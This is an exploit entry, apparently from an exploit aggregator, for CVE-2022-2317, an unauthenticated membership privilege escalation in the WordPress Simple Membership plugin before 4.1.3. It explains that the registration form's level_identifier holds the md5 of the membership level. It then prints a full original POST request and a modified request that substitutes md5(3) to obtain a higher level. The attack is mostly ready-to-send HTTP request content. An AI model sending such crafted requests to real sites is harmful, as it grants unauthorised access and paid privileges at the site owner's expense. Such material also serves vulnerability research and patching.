Exploit for Simple Membership < 4.1.3 - Unauthenticated Membership Privilege Escalation CVE-2022-2317

Name: Exploit for Simple Membership < 4.1.3 - Unauthenticated Membership Privilege Escalation CVE-2022-2317
Rating: 5 (90 reviews)

2022-07-06 | CVSS 0.7

## https://sploitus.com/exploit?id=WPEX-ID:77B7CA19-294C-4480-8F57-6FDDFC67FFFB
The request contains the level_identifier parameter with the md5(2) value, where 2 is the default membership level.
Value during registration - c81e728d9d4c2f636f067f89cc14862c

An attacker can change this value and get a different membership level.

Original request:

POST /membership-join/membership-registration/ HTTP/1.1
Host: wordpress.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 281
Origin: http://wordpress.local
Connection: close
Referer: http://wordpress.local/membership-join/membership-registration/
Cookie: swpm_session=aa21a306ba6e73498ee136da0d751b47; swpm_in_use=swpm_in_use
Upgrade-Insecure-Requests: 1

level_identifier=c81e728d9d4c2f636f067f89cc14862c&user_name=user_low3&email=user_low3%40jet.local&password=user&password_re=user&first_name=user&last_name=user&membership_level=2&swpm_level_hash=947098d78fd5617082ca190a28c163b0&swpm_registration_submit=Register&action=custom_posts


Modified query, with which attacker can get the third level (level_identifier changed to md5(3)):

POST /membership-join/membership-registration/ HTTP/1.1
Host: wordpress.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 281
Origin: http://wordpress.local
Connection: close
Referer: http://wordpress.local/membership-join/membership-registration/
Cookie: swpm_session=aa21a306ba6e73498ee136da0d751b47; swpm_in_use=swpm_in_use
Upgrade-Insecure-Requests: 1

level_identifier=eccbc87e4b5ce2fe28308fd9f2a7baf3&user_name=user_low3&email=user_low3%40domain.local&password=userpass&password_re=userpass&first_name=user&last_name=user&membership_level=2&swpm_level_hash=947098d78fd5617082ca190a28c163b0&swpm_registration_submit=Register&action=custom_posts